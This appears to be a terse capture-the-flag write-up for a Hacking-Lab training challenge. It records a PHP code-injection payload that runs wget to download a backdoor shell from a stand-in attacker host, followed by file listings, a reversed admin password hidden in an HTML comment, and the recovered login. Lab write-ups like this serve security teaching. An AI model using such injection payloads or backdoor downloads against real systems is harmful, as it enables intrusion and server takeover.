<?system("wget http://www.really_nasty_hacker.com/shell.txt");?> to execute the php code and download the backdoor (see 8026_1.png and 8026_2.png)
http://hackademics.hacking-lab.com/ch009/y0_man_y0.php
ls
index.php adminpanel.php y0_man_y0.php log.history.php
http://hackademics.hacking-lab.com/ch009/adminpanel.php -> prompt for credentials
http://hackademics.hacking-lab.com/ch009/log.history.php -> not found
<!-- slrig_$$ap_$GN0RTS_4_s1_s1Ht :dr owssap nimda :emanresu -->
<!-- slrig_$\(ap_\)GN0RTS_4_s1_s1Ht :drowssap nimda :emanresu -->
<!-- username: admin password: tH1s_1s_4_STR0NG\(_pa\)$_girls -->
adminpanel.php (see 8026_3.png)
admin
tH1s_1s_4_STR0NG\(_pa\)$_girls